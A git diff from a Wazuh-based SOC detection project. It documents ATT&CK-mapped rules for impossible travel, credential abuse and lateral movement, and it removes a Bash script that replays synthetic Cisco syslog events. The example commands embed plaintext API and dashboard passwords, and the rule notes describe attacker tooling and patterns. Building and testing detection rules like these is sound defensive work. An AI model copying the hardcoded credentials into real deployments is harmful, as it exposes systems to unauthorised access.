+File: `rules/soc-c1-c3-rules.xml` | Decoder: `soc-mvp-vpn` (prod) / `soc-mvp-windows` (sim) | Source: `source=vpn` / `source=windows`
+
+**ATT&CK context:** Impossible travel targets **Valid Accounts (T1078)** — specifically the scenario where stolen credentials are used by an attacker in one geography while the legitimate user is in another. A login from Thailand followed by a login from Russia 10 minutes later is physically impossible; one of them is a threat actor.
+
+> Full impossible-travel correlation requires the `soc-integrator` detection service. Wazuh rules flag per-event geo-anomaly candidates; upstream correlation confirms the travel impossibility.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                                  | MITRE ID | Technique      | Tactic                           |
+| ------- | ----- | ------------------------------------------------------------------------- | -------- | -------------- | -------------------------------- |
+| 100501  | 12    | C1-01: Impossible travel — VPN login from geographically distant location | T1078    | Valid Accounts | Initial Access / Defense Evasion |
+
+### Production Rules
+
+| Rule ID | Level | Match Condition                   | Description                                               | MITRE ID | Technique      |
+| ------- | ----- | --------------------------------- | --------------------------------------------------------- | -------- | -------------- |
+| 110501  | 12    | `event_type=vpn_login_success`    | VPN login with geo context — impossible travel candidate  | T1078    | Valid Accounts |
+| 110502  | 15    | `event_type=c1_impossible_travel` | Impossible travel confirmed by soc-integrator correlation | T1078    | Valid Accounts |
+
+**T1078 — Valid Accounts (Impossible Travel)**
+This is the highest-confidence valid-account detection because it does not rely on password patterns or known bad IPs — it relies on physical impossibility. Rule 110502 (level 15, the highest in this ruleset) fires only after the soc-integrator has correlated two logins and confirmed they cannot represent the same person travelling normally.
+
+---
+
+## C2 — Advanced Credential Abuse & Privilege Misuse
+
+File: `rules/soc-c1-c3-rules.xml` | Decoder: `soc-mvp-windows` | Source: `source=windows`
+
+**ATT&CK context:** C2 detects insider threat and post-compromise privilege abuse patterns that are individually legitimate but anomalous in context — an admin logging in at 3am, a service account used interactively, a dormant account suddenly active. These require behavioural baselining to distinguish real attacks from noise.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                                | MITRE ID  | Technique                       | Tactic               |
+| ------- | ----- | ----------------------------------------------------------------------- | --------- | ------------------------------- | -------------------- |
+| 100511  | 12    | C2-01: Privileged account used outside business hours                   | T1078.002 | Valid Accounts: Domain Accounts | Privilege Escalation |
+| 100512  | 8     | C2-02: Dormant account activation detected                              | T1078     | Valid Accounts                  | Defense Evasion      |
+| 100513  | 12    | C2-03: Service account interactive logon                                | T1078.003 | Valid Accounts: Local Accounts  | Privilege Escalation |
+| 100514  | 12    | C2-04: Rapid privilege escalation followed by sensitive resource access | T1098     | Account Manipulation            | Persistence          |
+
+### Production Rules
+
+| Rule ID | Level | Event ID | Match Condition                                     | Description                                       | MITRE ID  | Technique                       |
+| ------- | ----- | -------- | --------------------------------------------------- | ------------------------------------------------- | --------- | ------------------------------- |
+| 110511  | 12    | 4624     | `is_admin=true` + `event_type=windows_auth_success` | Privileged account auth success — off-hours       | T1078.002 | Valid Accounts: Domain Accounts |
+| 110512  | 8     | 4624     | `event_type=windows_auth_success` + `legacy.`       | Dormant/legacy account auth success               | T1078     | Valid Accounts                  |
+| 110513  | 12    | 4624     | `is_service=true` + `logon_type=10`                 | Service account interactive logon (type 10)       | T1078.003 | Valid Accounts: Local Accounts  |
+| 110514  | 12    | 4732     | `is_admin=true`                                     | Rapid privilege escalation: group change by admin | T1098     | Account Manipulation            |
+
+**T1078.002 — Valid Accounts: Domain Accounts (Off-Hours)**
+Domain admin activity outside normal business hours (e.g. 2–5am local time) is a known attacker signature — legitimate admins rarely work at those hours but attackers work when defenders are asleep. Requires time-of-day context from the soc-integrator for production correlation.
+
+**T1078.003 — Valid Accounts: Local Accounts (Service Account Interactive Logon)**
+Service accounts are designed for automated processes, not interactive sessions. A service account logging in interactively (logon type 10 = Remote Interactive, or type 2 = Local Interactive) indicates either credential theft or an insider using a service account to evade personal activity tracking.
+
+---
+
+## C3 — Lateral Movement & Internal Reconnaissance
+
+File: `rules/soc-c1-c3-rules.xml` | Decoders: `soc-mvp-windows`, `soc-mvp-windows-lateral` | Source: `source=windows`
+
+**ATT&CK context:** After establishing initial access, attackers move laterally to reach high-value targets (domain controllers, file servers, backup systems). C3 detects the burst patterns that characterise automated lateral movement tools (Cobalt Strike, Impacket, BloodHound) — many hosts contacted in a short time window.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                              | MITRE ID  | Technique                                 | Tactic                     |
+| ------- | ----- | ----------------------------------------------------- | --------- | ----------------------------------------- | -------------------------- |
+| 100521  | 12    | C3-01: Multiple auth successes across different hosts | T1021     | Remote Services                           | Lateral Movement           |
+| 100522  | 12    | C3-02: SMB/RDP lateral movement burst pattern         | T1021.002 | Remote Services: SMB/Windows Admin Shares | Lateral Movement           |
+| 100523  | 15    | C3-03: Admin account accessing many servers rapidly   | T1021.001 | Remote Services: RDP                      | Lateral Movement           |
+| 100524  | 8     | C3-04: Internal scanning / enumeration burst pattern  | T1046     | Network Service Discovery                 | Discovery / Reconnaissance |
+
+### Production Rules
+
+| Rule ID | Level | Event ID | Match Condition                                       | Description                                   | MITRE ID  | Technique                 |
+| ------- | ----- | -------- | ----------------------------------------------------- | --------------------------------------------- | --------- | ------------------------- |
+| 110521  | 12    | 4624     | `dstport=3389` + `event_type=windows_auth_success`    | RDP auth success to remote host               | T1021.001 | Remote Services: RDP      |
+| 110522  | 12    | 4624     | `dstport=445` + `event_type=windows_lateral_movement` | SMB lateral movement burst                    | T1021.002 | SMB/Windows Admin Shares  |
+| 110523  | 15    | 4624     | `is_admin=true` + `event_type=windows_auth_success`   | Admin RDP success to multiple servers rapidly | T1021.001 | Remote Services: RDP      |
+| 110524  | 8     | —        | `event_type=internal_scan`                            | Internal scanning/enumeration burst           | T1046     | Network Service Discovery |
+
+**T1021 — Remote Services (Lateral Movement)**
+An account successfully authenticating to many distinct internal hosts in a short time window (minutes, not hours) is a reliable lateral movement signal. Legitimate admin activity is targeted and intentional; lateral movement tools spray credentials across IP ranges.
+
+**T1046 — Network Service Discovery (Internal Scanning)**
+After initial compromise, attackers scan internal subnets to map the network — identifying domain controllers, databases, backup servers, and other high-value targets. Internal port scanning is anomalous in most environments and should be treated as a high-priority finding.
+
+---
+
+## Rule ID Summary
+
+| Range                                  | Section              | Count   |
+| -------------------------------------- | -------------------- | ------- |
+| 100200, 100205, 100210, 100220, 100230 | Base / grouping      | 5       |
+| 100301–100302 / 110301–110302          | A1 DNS IOC           | 4       |
+| 100311–100320 / 110311–110320          | A2 FortiGate FW      | 20      |
+| 100331–100335 / 110331–110335          | A3 FortiGate VPN     | 10      |
+| 100341–100364 / 110341–110362          | A4 Windows/AD        | 37      |
+| 100401–100403 / 110401–110403          | B1 VMware            | 6       |
+| 100411 / 110411                        | B2 Log Monitor       | 2       |
+| 100421–100426 / 110421–110426          | B3 Sysmon            | 12      |
+| 100501 / 110501–110502                 | C1 Impossible Travel | 3       |
+| 100511–100514 / 110511–110514          | C2 Credential Abuse  | 8       |
+| 100521–100524 / 110521–110524          | C3 Lateral Movement  | 8       |
+| **Total**                              |                      | **115** |
+
+---
+
+## Running the Simulator
+
+```bash
+cd scripts
+
+# Single batch (all use cases)
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
+  python3 send-wazuh-api-sim.py --selector all --batch
+
+# Continuous (all use cases, 65s between rounds to stay under rate limit)
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
+  python3 send-wazuh-api-sim.py --selector all --batch --forever --delay 65
+
+# Single section
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
+  python3 send-wazuh-api-sim.py --selector a2 --batch
+
+# Single use case
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
+  python3 send-wazuh-api-sim.py --selector A2-01 --count 1
+```
+
+## Wazuh Operations
+
+```bash
+# Reload rules (no container restart needed)
+docker exec wazuh-single-wazuh.manager-1 /var/ossec/bin/wazuh-control reload
+
+# Test a single event
+echo 'soc_mvp_test=true source=dns event_type=ioc_dns_traffic src_ip=1.2.3.4' | \
+  docker exec -i wazuh-single-wazuh.manager-1 /var/ossec/bin/wazuh-logtest
+
+# Watch live alerts for SOC rules
+docker exec wazuh-single-wazuh.manager-1 \
+  tail -f /var/ossec/logs/alerts/alerts.json | grep --line-buffered "soc_mvp"
+```

samples/README.md

@@ -0,0 +1,15 @@
+# SOC Production Sample Logs
+
+These files provide realistic sample events aligned with current production-focused Wazuh rules (`110xxx`):
+
+- `appendix-a-production-samples.log`
+- `appendix-b-production-samples.log`
+- `appendix-c-production-samples.log`
+
+Notes:
+
+- FortiGate and VMware lines are raw/syslog-style key-value examples.
+- Windows samples are in compact JSON using Wazuh-decoded field names (`win.system.eventID`, `win.eventdata.*`) so rule intent is explicit.
+- SOC Integrator correlation examples use `soc_event=...` payloads consumed by custom decoders (`soc-prod-dns`, `soc-prod-integrator`).
+
+These are reference samples for testing and documentation, not exact byte-for-byte exports from a single environment.

scripts/README.md

@@ -1,458 +1,67 @@
-# Test Event Scripts
+# Scripts
 
-## SOC Integrator UI (`Run Sim Logs`) target mapping
+## Combined Wazuh simulator
 
-`/ui -> Systems -> Run Sim Logs` now supports **multi-select Target** values based on selected `Script`.
-The UI starts one simulator run per selected target (except `all`, which runs a single `all` run).
-
-- `fortigate`: `all`, `501E`, `80F`, `60F`, `40F`
-- `endpoint`: `all`, `windows`, `mac`, `linux`
-- `cisco`: `all`, `asa_acl_deny`, `asa_vpn_auth_fail`, `ios_login_fail`, `ios_config_change`
-- `proposal_required`: `all`, `a1`, `a2`, `a3`, `a4`
-- `proposal_appendix_b`: `all`, `b1`, `b2`, `b3`
-- `proposal_appendix_c`: `all`, `c1`, `c2`, `c3`
-- `wazuh_test`: `all`, `ioc_dns`, `ioc_ips`, `vpn_outside_th`, `windows_auth_fail`
-
-## Send Wazuh test events
-
-Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
+Use one script for all Appendix A/B/C simulation log replay.
 
 ```bash
-scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds]
+scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run]
 ```
 
-Optional flag:
-
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
-
-Scenarios:
-
-- `ioc_dns`
-- `ioc_ips`
-- `vpn_outside_th`
-- `windows_auth_fail`
-- `all`
-
 Examples:
 
 ```bash
-scripts/send-wazuh-test-events.sh all
-scripts/send-wazuh-test-events.sh vpn_outside_th 5 0.2
-WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-test-events.sh ioc_ips
-scripts/send-wazuh-test-events.sh all 1 2 --forever
+scripts/send-wazuh-sim-logs.sh all 1 0.2
+scripts/send-wazuh-sim-logs.sh a2 1 0
+scripts/send-wazuh-sim-logs.sh B3-06 1 0
+scripts/send-wazuh-sim-logs.sh c1 1 2 --forever
+scripts/send-wazuh-sim-logs.sh all 1 0 --dry-run
 ```
 
-Environment overrides:
+Environment variables:
 
 - `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
 - `WAZUH_SYSLOG_PORT` (default `514`)
-- `WAZUH_TEST_SRC_IP`
-- `WAZUH_TEST_DOMAIN`
-- `WAZUH_TEST_USER`
-
-Transport notes:
-
-- Uses `nc` if available.
-- Falls back to Bash UDP redirection (`/dev/udp/host/port`) when `nc` is unavailable.
-
-## Send Cisco device test events
-
-Use this to inject Cisco-style syslog events (ASA/IOS) into Wazuh manager.
+- `DRY_RUN=1` (alternative to `--dry-run`)
 
-```bash
-scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds]
-```
-
-Optional flag:
+Selector support:
 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
+- Global: `all`
+- Appendix: `a`, `b`, `c`, `appendix-a`, `appendix-b`, `appendix-c`
+- Section: `a1`, `a2`, `a3`, `a4`, `b1`, `b2`, `b3`, `c1`, `c2`, `c3`
+- Use-case ID: `A1-01` ... `C3-04`
 
-Scenarios:
-
-- `asa_acl_deny`
-- `asa_vpn_auth_fail`
-- `ios_login_fail`
-- `ios_config_change`
-- `all`
-
-Examples:
+Sample sources:
 
-```bash
-scripts/send-wazuh-cisco-test-events.sh all
-scripts/send-wazuh-cisco-test-events.sh asa_acl_deny 5 0.2
-CISCO_DEVICE_HOST=edge-fw-01 scripts/send-wazuh-cisco-test-events.sh ios_login_fail
-scripts/send-wazuh-cisco-test-events.sh all 1 2 --forever
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `CISCO_DEVICE_HOST`
-- `CISCO_SRC_IP`
-- `CISCO_DST_IP`
-- `CISCO_VPN_USER`
-- `CISCO_ADMIN_USER`
+- `samples/appendix-a-production-samples.log`
+- `samples/appendix-b-production-samples.log`
+- `samples/appendix-c-production-samples.log`
 
-## Send FortiGate firewall test events
+## Dashboard import
 
-Use this to inject FortiGate-style syslog events (models `501E`, `80F`, `60F`, `40F`) into Wazuh manager.
+Import Wazuh dashboards (NDJSON):
 
 ```bash
-scripts/send-wazuh-fortigate-test-events.sh [model] [count] [delay_seconds]
+scripts/import-wazuh-dashboard.sh <path-to-ndjson>
 ```
 
-Optional flag:
-
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
-
-Models:
-
-- `501E`
-- `80F`
-- `60F`
-- `40F`
-- `all`
-
 Examples:
 
 ```bash
-scripts/send-wazuh-fortigate-test-events.sh all
-scripts/send-wazuh-fortigate-test-events.sh 80F 5 0.2
-WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-fortigate-test-events.sh 60F
-scripts/send-wazuh-fortigate-test-events.sh all 1 2 --forever
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `FGT_SRC_IP`
-- `FGT_DST_IP`
-- `FGT_DOMAIN`
-- `FGT_USER`
-
-## Run continuous FortiGate simulation
-
-Use this to generate ongoing FortiGate-like traffic and security events for Wazuh testing.
-
-```bash
-scripts/send-wazuh-fortigate-continuous.sh [profile] [models] [base_delay_seconds]
-```
-
-Profiles:
-
-- `normal` (mostly allowed traffic, occasional admin/vpn/webfilter)
-- `incident` (higher IPS/webfilter/vpn anomalies)
-- `mixed` (balanced baseline + anomalies)
-
-Models:
-
-- `501E`
-- `80F`
-- `60F`
-- `40F`
-- `all`
-
-Examples:
-
-```bash
-scripts/send-wazuh-fortigate-continuous.sh mixed all 0.8
-scripts/send-wazuh-fortigate-continuous.sh incident 80F 0.3
-SIM_MAX_EVENTS=200 scripts/send-wazuh-fortigate-continuous.sh normal 501E 1.0
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `SIM_MAX_EVENTS` (default `0`, which means run forever)
-- `SIM_SRC_PREFIX` (default `10.10.20`)
-- `SIM_VPN_USER`
-- `SIM_ADMIN_USER`
-
-## Simulate all required logs from proposal
-
-Use this to generate synthetic logs for all use cases listed in:
-`Security Detection & Threat Intelligence Enhancement Proposal-2.md` Appendix A (A1-A4).
-
-```bash
-scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
-```
-
-Optional flag:
-
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
-
-Selectors:
-
-- `all` (all Appendix A use cases)
-- `a1`, `a2`, `a3`, `a4` (by section)
-- specific use case id, e.g. `A2-01`, `A3-05`, `A4-24`
-
-Examples:
-
-```bash
-scripts/send-wazuh-proposal-required-events.sh all 1
-scripts/send-wazuh-proposal-required-events.sh a3 3 0.5
-scripts/send-wazuh-proposal-required-events.sh A3-05 1
-DRY_RUN=1 scripts/send-wazuh-proposal-required-events.sh all 1
-scripts/send-wazuh-proposal-required-events.sh a2 1 2 --forever
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `EVENT_DELAY` (default `0.05`)
-- `DRY_RUN` (default `0`, set `1` to print only)
-- `FGT_DEVNAME`, `FGT_DEVID`
-- `WIN_HOST`, `DNS_HOST`
-- `SIM_VPN_USER`
-
-## Simulate Appendix B logs (revise proposal)
-
-Use this to generate synthetic logs for Appendix B (B1-B3) in:
-`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
-
-```bash
-scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
-```
-
-Optional flag:
-
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
-
-Selectors:
-
-- `all` (all Appendix B use cases)
-- `b1`, `b2`, `b3` (by section)
-- specific use case id, e.g. `B1-01`, `B2-01`, `B3-06`
-
-Examples:
-
-```bash
-scripts/send-wazuh-proposal-appendix-b-events.sh all 1
-scripts/send-wazuh-proposal-appendix-b-events.sh b3 2 0.5
-scripts/send-wazuh-proposal-appendix-b-events.sh B3-06 1
-DRY_RUN=1 scripts/send-wazuh-proposal-appendix-b-events.sh all 1
-scripts/send-wazuh-proposal-appendix-b-events.sh b1 1 2 --forever
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `EVENT_DELAY` (default `0.05`)
-- `DRY_RUN` (default `0`, set `1` to print only)
-- `VCENTER_HOST`, `ESXI_HOST`, `LOGMON_HOST`, `WIN_SYSMON_HOST`
-- `SIM_USER`
-
-## Simulate Appendix C logs (future enhancement MVP)
-
-Use this to generate synthetic logs for Appendix C (C1-C3) in:
-`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
-
-```bash
-scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds]
-```
-
-Optional flag:
-
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
-
-Selectors:
-
-- `all` (all Appendix C use cases)
-- `c1`, `c2`, `c3` (by section)
-- specific use case id, e.g. `C1-01`, `C2-03`, `C3-04`
-
-Examples:
-
-```bash
-scripts/send-wazuh-proposal-appendix-c-events.sh all 1
-scripts/send-wazuh-proposal-appendix-c-events.sh c1 1 0.5
-scripts/send-wazuh-proposal-appendix-c-events.sh C3-04 1
-DRY_RUN=1 scripts/send-wazuh-proposal-appendix-c-events.sh all 1
-scripts/send-wazuh-proposal-appendix-c-events.sh c2 1 2 --forever
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `EVENT_DELAY` (default `0.05`)
-- `DRY_RUN` (default `0`, set `1` to print only)
-- `VPN_HOST`, `WIN_HOST`
-- `SIM_USER`, `SIM_SERVICE_USER`, `SIM_SRC_IP`
-
-## Simulate endpoint client-agent logs (Windows / macOS / Linux)
-
-Use this to inject realistic endpoint telemetry for client agents into Wazuh.
-
-```bash
-scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds]
-```
-
-Optional flag:
-
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
-
-Platforms:
-
-- `windows`
-- `mac`
-- `linux`
-- `all`
-
-Scenarios:
-
-- `auth`
-- `process`
-- `persistence`
-- `privilege`
-- `malware`
-- `all`
-
-Examples:
-
-```bash
-scripts/send-wazuh-endpoint-agent-test-events.sh all all 1 0.2
-scripts/send-wazuh-endpoint-agent-test-events.sh windows process 10 0.1
-DRY_RUN=1 scripts/send-wazuh-endpoint-agent-test-events.sh linux all 1 0
-scripts/send-wazuh-endpoint-agent-test-events.sh all auth 1 2 --forever
-```
-
-Environment overrides:
-
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
-- `WAZUH_SYSLOG_PORT` (default `514`)
-- `DRY_RUN` (default `0`)
-- `WIN_HOST`, `MAC_HOST`, `LINUX_HOST`
-- `SIM_USER`
-
-## Shuffle sample workflow helpers
-
-Sample playbook design for Shuffle:
-
-- `shuffle-workflows/sample-ioc-playbook.md`
-
-Sample execution payload:
-
-- `scripts/events/shuffle-sample-execution.json`
-
-Trigger an existing Shuffle workflow from CLI:
-
-```bash
-scripts/trigger-shuffle-workflow.sh <workflow_id> [ioc_type] [ioc_value]
-```
-
-Create MVP workflows in Shuffle (from proposal mapping):
-
-```bash
-SHUFFLE_API_KEY=<your_key> scripts/create-shuffle-mvp-workflows.sh
-```
-
-This creates:
-
-- `MVP - IOC Enrichment and Case Routing`
-- `MVP - VPN Geo Anomaly Triage`
-
-## Import Wazuh Dashboard (FortiGate Simulation)
-
-Prebuilt saved objects file:
-
-- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
-
-Import helper:
-
-```bash
-scripts/import-wazuh-dashboard.sh
-```
-
-Optional overrides:
-
-```bash
-WAZUH_DASHBOARD_URL=https://localhost \
-WAZUH_DASHBOARD_USER=admin \
-WAZUH_DASHBOARD_PASS=SecretPassword \
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-fortigate-sim-dashboard.ndjson
-```
-
-After import, open dashboard:
-
-- `SOC FortiGate Simulation Overview`
-
-## Wazuh dashboard files (detailed)
-
-Dashboard saved objects are stored in `scripts/events/*.ndjson`.
-
-- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
-  
-  - Title: `SOC FortiGate Simulation Overview`
-  - Purpose: FortiGate simulation visibility (events over time, top devices, top event types, severity).
-  - Typical data source: `scripts/send-wazuh-fortigate-test-events.sh`
-
-- `scripts/events/wazuh-client-agents-dashboard.ndjson`
-  
-  - Title: `SOC Client Agent Simulation Overview`
-  - Purpose: Endpoint simulation visibility for Windows/macOS/Linux agent logs.
-  - Typical data source: `scripts/send-wazuh-endpoint-agent-test-events.sh`
-
-- `scripts/events/wazuh-proposal-required-dashboard.ndjson`
-  
-  - Title: `SOC Proposal Required Logs Overview`
-  - Purpose: Appendix A required-scope logs (A1-A4).
-  - Typical data source: `scripts/send-wazuh-proposal-required-events.sh`
-
-- `scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson`
-  
-  - Title: `SOC Proposal Appendix A+B Overview`
-  - Purpose: Combined Appendix A and B overview, including use-case table.
-  - Typical data sources:
-    - `scripts/send-wazuh-proposal-required-events.sh`
-    - `scripts/send-wazuh-proposal-appendix-b-events.sh`
-
-- `scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson`
-  
-  - Title: `SOC Proposal Appendix C Overview`
-  - Purpose: Appendix C MVP scope visibility (currently C1-C3 coverage).
-  - Typical data source: `scripts/send-wazuh-proposal-appendix-c-events.sh`
-
-- `scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson`
-  
-  - Title: `SOC Proposal Custom Rules Overview`
-  - Purpose: Monitor custom proposal rules (e.g., 1003xx/1004xx families), severity, and top descriptions.
-  - Typical data source: Any simulation script that triggers proposal custom rules.
-
-### Import any dashboard file
-
-```bash
-scripts/import-wazuh-dashboard.sh scripts/events/<dashboard-file>.ndjson
-```
-
-Examples:
-
-```bash
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
 ```
 
-Optional overrides:
+## Other helpers
 
-```bash
-WAZUH_DASHBOARD_URL=https://localhost \
-WAZUH_DASHBOARD_USER=admin \
-WAZUH_DASHBOARD_PASS=SecretPassword \
-OVERWRITE=true \
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
-```
+- `seed-iris-demo-data.sh`: seed IRIS demo cases/tasks via API.
+- `create-shuffle-mvp-workflows.sh`: create Shuffle MVP workflows from templates.
+- `trigger-shuffle-workflow.sh`: trigger a Shuffle workflow by ID.
+- `update-shuffle-workflow-from-template.sh`: update existing Shuffle workflow JSON from template.
 
-### Quick troubleshooting
+## Notes
 
-- Verify index pattern has data in Discover: `wazuh-alerts-*`.
-- Set time range wide enough (for example `Last 24 hours`).
-- If charts are empty but raw logs exist, re-import the latest NDJSON and refresh index fields.
+- Legacy `send-wazuh-*` simulator scripts were removed and replaced by `send-wazuh-sim-logs.sh`.
+- If you add new sample events, keep comments tagged with use-case IDs (for example `# A2-01 ...`) so selector filtering keeps working.

scripts/send-wazuh-cisco-test-events.sh

@@ -1,136 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-SCENARIO="${1:-all}"
-COUNT="${2:-1}"
-DELAY="${3:-0.3}"
-FOREVER="false"
-
-for arg in "${@:4}"; do
-  case "${arg}" in
-    --forever)
-      FOREVER="true"
-      ;;
-    *)
-      echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
-      exit 1
-      ;;
-  esac
-done
-
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
-
-CISCO_DEVICE_HOST="${CISCO_DEVICE_HOST:-cisco-asa-01}"
-CISCO_SRC_IP="${CISCO_SRC_IP:-198.51.100.25}"
-CISCO_DST_IP="${CISCO_DST_IP:-10.10.10.20}"
-CISCO_VPN_USER="${CISCO_VPN_USER:-vpn.user}"
-CISCO_ADMIN_USER="${CISCO_ADMIN_USER:-admin}"
-
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
-  echo "error: count must be a positive integer"
-  exit 1
-fi
-
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: delay must be numeric (example: 0.5)"
-  exit 1
-fi
-
-emit_syslog() {
-  local msg="$1"
-  local sent="false"
-
-  if command -v nc >/dev/null 2>&1; then
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-    echo "hint: install netcat or run with bash UDP support (/dev/udp)"
-    return 1
-  fi
-
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
-}
-
-random_id() {
-  printf "%s" "cisco-evt-$(date +%s)-$RANDOM-$RANDOM"
-}
-
-send_asa_acl_deny() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<166>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %ASA-4-106023: Deny tcp src outside:${CISCO_SRC_IP}/51515 dst inside:${CISCO_DST_IP}/445 by access-group \"outside_access_in\" [0x0, 0x0] soc_mvp_test=true vendor=cisco product=asa event_id=${eid} event_type=cisco_asa_acl_deny severity=high"
-}
-
-send_asa_vpn_auth_fail() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<166>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %ASA-4-113019: Group = RA-VPN, Username = ${CISCO_VPN_USER}, IP = ${CISCO_SRC_IP}, Session disconnected. Session Type: SSL, Duration: 0h:00m:01s, Bytes xmt: 0, Bytes rcv: 0, Reason: User Requested. soc_mvp_test=true vendor=cisco product=asa event_id=${eid} event_type=cisco_vpn_auth_fail severity=medium"
-}
-
-send_ios_login_fail() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<165>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ${CISCO_ADMIN_USER}] [Source: ${CISCO_SRC_IP}] [localport: 22] [Reason: Login Authentication Failed] at 19:30:00 UTC Tue Feb 17 2026 soc_mvp_test=true vendor=cisco product=ios event_id=${eid} event_type=cisco_ios_login_fail severity=medium"
-}
-
-send_ios_config_change() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<165>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %SYS-5-CONFIG_I: Configured from console by ${CISCO_ADMIN_USER} on vty0 ( ${CISCO_SRC_IP} ) soc_mvp_test=true vendor=cisco product=ios event_id=${eid} event_type=cisco_config_change severity=low"
-}
-
-send_once() {
-  case "${SCENARIO}" in
-    asa_acl_deny)
-      send_asa_acl_deny
-      ;;
-    asa_vpn_auth_fail)
-      send_asa_vpn_auth_fail
-      ;;
-    ios_login_fail)
-      send_ios_login_fail
-      ;;
-    ios_config_change)
-      send_ios_config_change
-      ;;
-    all)
-      send_asa_acl_deny
-      send_asa_vpn_auth_fail
-      send_ios_login_fail
-      send_ios_config_change
-      ;;
-    *)
-      echo "error: unknown scenario '${SCENARIO}'"
-      echo "valid: asa_acl_deny | asa_vpn_auth_fail | ios_login_fail | ios_config_change | all"
-      exit 1
-      ;;
-  esac
-}
-
-if [[ "${FOREVER}" == "true" ]]; then
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
-  trap 'echo; echo "stopped"; exit 0' INT TERM
